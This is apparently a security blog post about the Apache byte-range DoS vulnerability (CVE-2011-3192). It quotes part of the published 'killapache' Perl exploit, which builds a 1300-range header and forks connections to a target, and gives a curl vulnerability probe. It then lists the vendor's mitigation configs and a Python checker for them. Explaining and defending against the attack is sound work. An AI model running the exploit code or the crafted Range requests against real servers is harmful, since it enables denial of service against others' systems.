A new DoS vulnerability has been found in the last few days that affects many versions of the Apache HTTP Server running on Linux operating systems such as CentOS, Red Hat and SUSE. The published exploit permits DoS/DDoS attacks: an attacker can use this vulnerability to take down your web server if Apache does not have sufficient protective measures in place. Apache's vendors have not made a patch for this vulnerability available yet. I tested this vulnerability against an Apache server that is affected by it. I have already updated our IPS's signatures to prevent this attack, but I want to show you how the attack works and explain how to protect your web server until a full patch is released.
A section of the exploit code, in Perl (I don't want to show all of the code, which has already been published on every security bulletin since 19 Aug):
```perl
sub killapache {
    print "ATTACKING $ARGV[0] [using $numforks forks]\n";
    $pm = new Parallel::ForkManager($numforks);
    $|=1;
    srand(time());
    # Build the range list: ",5-0,5-1,...,5-1299" (1300 overlapping ranges)
    $p = "";
    for ($k=0;$k<1300;$k++) {
        $p .= ",5-$k";
    }
    # One forked worker per connection, all hitting port 80 of the target
    for ($k=0;$k<$numforks;$k++) {
        my $pid = $pm->start and next;
        $x = "";
        my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp');
```
You can follow the steps below to understand the attack method and to prevent it.
We send a request whose Range header asks for two ranges, "bytes=0-1,0-2", using curl and look for a 206 Partial Content reply:

```shell
curl -I -H "Range: bytes=0-1,0-2" -s host | grep Partial
```

If you see a status line beginning with "HTTP/1.1 206 Partial Content", the web server honours multi-range requests. Such a server will keep accepting these requests and allocate memory for every range in each one until its memory is exhausted (the swap area fills up).
```perl
        # Probe: a HEAD request carrying the oversized Range header built above.
        # A "206 Partial Content" reply means the server accepts it.
        $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
        print $sock $p;
        $x = <$sock>;
        if ($x =~ /Partial/) {
            print "host seems vuln\n";
            return 1;
        } else {
            return 0;
        }
}
```
If the web server is not vulnerable, the exploit prints the following notification and stops:
(-Host does not seem vulnerable.)
If the web server is vulnerable, however, the exploit goes on to attack the host.

This morning I received news about this attack from our software vendors by email. They made some recommendations to prevent the DoS attack until a full fix is available. I want to share these recommendations with you.
1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then either ignore the Range: header or reject the request.
Option 1: (Apache 2.0 and 2.2)
# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range
Option 2: (Also for Apache 1.3)
# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]
2) Limit the size of request header fields to a few hundred bytes. Note that while this keeps the offending Range header short, it may break other headers, such as sizeable cookies or security fields.
LimitRequestFieldSize 200
Note that as the attack evolves in the field you will likely have to lower this further and/or impose other LimitRequestFields limits.
See: http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
3) Use mod_headers to completely dis-allow the use of Range headers:
RequestHeader unset Range
Note that this may break certain clients – such as those used for e-Readers and progressive/http-streaming video.
4) Deploy a Range header count module as a temporary stopgap measure:
http://people.apache.org/~dirkx/mod_rangecnt.c
Precompiled binaries for some platforms are available at:
http://people.apache.org/~dirkx/BINARIES.txt
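To see what recommendations 1 and 2 actually let through, here is an added Python example (not from the original post and not from the Apache advisory) that applies the advisory's SetEnvIf pattern and mod_rewrite regex to constructed Range headers, builds the 1300-range header the published probe sends, and checks header lines against a LimitRequestFieldSize of 200. The function names, the sample headers and the way the field size is approximated are assumptions made for this example.

```python
import re

# Regex from the advisory's mod_rewrite rule (RewriteCond %{HTTP:range} !(...)):
# the request is allowed only if the header is empty or is "bytes=" followed by
# at most five comma-separated ranges. The negation in RewriteCond means
# "reject when the header does NOT match this".
ALLOWED_RANGE = re.compile(r'^bytes=[^,]+(,[^,]+){0,4}$|^$')

# Pattern from the advisory's SetEnvIf rule: five or more commas in the header
# (i.e. more than five ranges) sets bad-range=1 and the header is unset.
BAD_RANGE = re.compile(r'(,.*?){5,}')


def count_ranges(range_header):
    """Number of non-empty, comma-separated range specs after the '=' sign."""
    if not range_header:
        return 0
    _, _, spec = range_header.partition('=')
    return len([r for r in spec.split(',') if r.strip()])


def rewrite_rejects(range_header):
    """True when the mod_rewrite mitigation would answer 403 Forbidden."""
    return ALLOWED_RANGE.search(range_header or '') is None


def setenvif_drops(range_header):
    """True when the SetEnvIf mitigation would strip the Range header."""
    return BAD_RANGE.search(range_header or '') is not None


def killapache_range_header(nranges=1300):
    """Range header value as built by the published probe: 'bytes=0-' followed
    by ',5-0,5-1,...,5-(n-1)'. Constructed here for the example."""
    return 'bytes=0-' + ''.join(',5-%d' % k for k in range(nranges))


def exceeds_field_size(name, value, limit=200):
    """Would 'LimitRequestFieldSize <limit>' reject this header line?
    Approximation (assumption): the line is counted as 'Name: value'."""
    return len(name) + 2 + len(value) > limit


def verdict(range_header):
    """Summarise what each mitigation does with a given Range header."""
    return {
        'ranges': count_ranges(range_header),
        'rewrite_403': rewrite_rejects(range_header),
        'setenvif_unset': setenvif_drops(range_header),
        'field_size_reject': exceeds_field_size('Range', range_header),
    }


if __name__ == '__main__':
    # Constructed sample headers: a normal two-range request, the boundary
    # cases around five ranges, and the probe's 1300-range header.
    samples = [
        'bytes=0-1,0-2',
        'bytes=0-1,0-2,0-3,0-4,0-5',
        'bytes=0-1,0-2,0-3,0-4,0-5,0-6',
        killapache_range_header(),
    ]
    for h in samples:
        print('%-40s %s' % (h[:37] + ('...' if len(h) > 37 else ''), verdict(h)))
    # The caveat from recommendation 2: a large cookie is cut off by the
    # same 200-byte limit even though it has nothing to do with Range.
    print('300-byte Cookie rejected:', exceeds_field_size('Cookie', 'a' * 300))
```

The boundary behaviour is worth checking against your own config: five ranges pass both rules, six trip both, and the probe's header (over 9 KB) is also stopped by the 200-byte field limit, which is exactly why that limit also breaks sizeable cookies.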
Reference:
http://www.securityfocus.com/bid/49303/info
Stay safe.
Uğur Engin